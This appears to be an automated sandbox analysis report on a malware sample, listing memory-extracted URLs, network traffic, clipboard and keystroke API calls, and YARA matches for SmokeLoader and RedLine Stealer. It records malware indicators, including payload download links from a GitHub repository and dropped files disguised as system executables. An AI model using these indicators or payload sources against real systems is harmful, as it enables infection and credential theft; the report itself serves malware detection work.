Source: DFA6.exe, 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000000.2401576830.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, svchost015.exe.26.dr	String found in binary or memory: http://www.x-ways.net/order
Source: DFA6.exe, 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000000.2401576830.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, svchost015.exe.26.dr	String found in binary or memory: http://www.x-ways.net/order.html-d.htmlS
Source: DFA6.exe, 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000000.2401576830.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, svchost015.exe.26.dr	String found in binary or memory: http://www.x-ways.net/winhex/license
Source: DFA6.exe, 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000000.2401576830.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, svchost015.exe.26.dr	String found in binary or memory: http://www.x-ways.net/winhex/license-d-f.htmlS
Source: DFA6.exe, 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000000.2401576830.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, svchost015.exe.26.dr	String found in binary or memory: http://www.x-ways.net/winhex/subscribe
Source: DFA6.exe, 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000000.2401576830.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, svchost015.exe.26.dr	String found in binary or memory: http://www.x-ways.net/winhex/subscribe-d.htmlU
Source: IECFHDBA.29.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000001.00000000.1706663515.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000001.00000000.1703368759.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000001.00000000.1703368759.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000001.00000000.1706663515.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000001.00000000.1704715234.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000001.00000000.1704715234.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000001.00000000.1702660971.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1702194356.0000000001240000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000001.00000000.1704715234.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1704715234.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000001.00000000.1704715234.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: svchost015.exe, 0000001D.00000002.2662277736.0000000026E12000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2618548795.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, KJEHDHIEGIIIDHIDHDHJ.29.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: svchost015.exe, 0000001D.00000002.2662277736.0000000026E12000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2618548795.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, KJEHDHIEGIIIDHIDHDHJ.29.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: IECFHDBA.29.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ep
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.epnacl
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000001.00000000.1703368759.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000001.00000000.1703368759.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, IECFHDBA.29.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, IECFHDBA.29.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: svchost015.exe, 0000001D.00000002.2662277736.0000000026E12000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2618548795.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, KJEHDHIEGIIIDHIDHDHJ.29.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: svchost015.exe, 0000001D.00000002.2662277736.0000000026E12000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2618548795.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, KJEHDHIEGIIIDHIDHDHJ.29.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: IECFHDBA.29.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: IECFHDBA.29.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: IECFHDBA.29.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000001.00000000.1706663515.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: DFA6.exe, 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000000.2401576830.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, svchost015.exe.26.dr	String found in binary or memory: https://github.com/tesseract-ocr/tessdata/
Source: RegAsm.exe, 0000001F.00000002.4107921007.0000000002494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll
Source: RegAsm.exe, 0000001F.00000002.4107921007.0000000002494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe
Source: RegAsm.exe, 0000001F.00000002.4107921007.0000000002494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000001.00000000.1703368759.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: KJEHDHIEGIIIDHIDHDHJ.29.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3.dll.29.dr, softokn3.dll.29.dr, nss3.dll.29.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: https://mozilla.org0/
Source: explorer.exe, 00000001.00000000.1706663515.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000001.00000000.1706663515.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: DFA6.exe, 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.26.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: RegAsm.exe, 0000001F.00000002.4107921007.0000000002494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: RegAsm.exe, 0000001F.00000002.4107921007.0000000002494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: RegAsm.exe, 0000001F.00000002.4107921007.0000000002494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
Source: FCAAEBFHJJDAAKFIECGDBKJDGI.29.dr	String found in binary or memory: https://support.mozilla.org
Source: FCAAEBFHJJDAAKFIECGDBKJDGI.29.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: FCAAEBFHJJDAAKFIECGDBKJDGI.29.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: svchost015.exe, 0000001D.00000003.2483405592.0000000020D21000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2614164343.000000000042C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2614164343.000000000042C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
Source: svchost015.exe, 0000001D.00000002.2614164343.000000000042C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: svchost015.exe, 0000001D.00000003.2483405592.0000000020D21000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e173810.9
Source: svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF
Source: svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1706663515.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000001.00000000.1706663515.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: svchost015.exe, 0000001D.00000002.2662277736.0000000026E12000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2618548795.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, KJEHDHIEGIIIDHIDHDHJ.29.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: Burn.pif, 00000011.00000003.2227175462.0000000003C5B000.00000004.00000800.00020000.00000000.sdmp, Burn.pif, 00000011.00000003.2924741596.000000000350A000.00000004.00000020.00020000.00000000.sdmp, SwiftServe.scr.17.dr, Dod.7.dr, Burn.pif.8.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: freebl3.dll.29.dr, softokn3.dll.29.dr, nss3.dll.29.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.29.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, IECFHDBA.29.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: svchost015.exe, 0000001D.00000002.2662277736.0000000026E12000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2618548795.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, KJEHDHIEGIIIDHIDHDHJ.29.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: Burn.pif.8.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Burn.pif, 00000011.00000003.2227175462.0000000003C5B000.00000004.00000800.00020000.00000000.sdmp, Burn.pif, 00000011.00000003.2924741596.000000000350A000.00000004.00000020.00020000.00000000.sdmp, SwiftServe.scr.17.dr, Dod.7.dr, Burn.pif.8.dr	String found in binary or memory: https://www.globalsign.com/repository/06
Source: IECFHDBA.29.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: FCAAEBFHJJDAAKFIECGDBKJDGI.29.dr	String found in binary or memory: https://www.mozilla.org
Source: svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: FCAAEBFHJJDAAKFIECGDBKJDGI.29.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: FCAAEBFHJJDAAKFIECGDBKJDGI.29.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: svchost015.exe, 0000001D.00000003.2581535535.000000002707A000.00000004.00000020.00020000.00000000.sdmp, FCAAEBFHJJDAAKFIECGDBKJDGI.29.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: FCAAEBFHJJDAAKFIECGDBKJDGI.29.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: svchost015.exe, 0000001D.00000003.2581535535.000000002707A000.00000004.00000020.00020000.00000000.sdmp, FCAAEBFHJJDAAKFIECGDBKJDGI.29.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1703368759.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000001.00000000.1703368759.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
Source: DFA6.exe, 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.26.dr	String found in binary or memory: https://www.ssl.com/repository0
Source: DFA6.exe, 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000000.2401576830.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, svchost015.exe.26.dr	String found in binary or memory: https://www.x-ways.net/forensics/x-tensions.html
Source: DFA6.exe, 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000000.2401576830.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, svchost015.exe.26.dr	String found in binary or memory: https://www.x-ways.net/forensics/x-tensions.htmlf
Source: DFA6.exe, 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000000.2401576830.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, svchost015.exe.26.dr	String found in binary or memory: https://www.x-ways.net/winhex/forum/
Source: DFA6.exe, 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000000.2401576830.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, svchost015.exe.26.dr	String found in binary or memory: https://www.x-ways.net/winhex/forum/www.x-ways.net/winhex/templates/www.x-ways.net/dongle_protection

Source: unknown	Network traffic detected: HTTP traffic on port 56171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56171

Source: unknown

HTTPS traffic detected: 84.32.84.144:443 -> 192.168.2.4:56171 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000003.00000002.1937857892.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1937904210.00000000007B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1712546480.0000000002361000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1712222757.0000000000850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

Code function: 25_2_00E94632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

25_2_00E94632

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

Code function: 25_2_00E94830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

25_2_00E94830

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

25_2_00E94632

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

Code function: 25_2_00E80508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

25_2_00E80508

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

Code function: 25_2_00EAD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

25_2_00EAD164

Source: Yara match	File source: 29.0.svchost015.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DFA6.exe PID: 1396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost015.exe PID: 708, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\svchost015.exe, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000003.00000002.1937968230.0000000000848000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000003.00000002.1937857892.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1712342116.000000000088A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
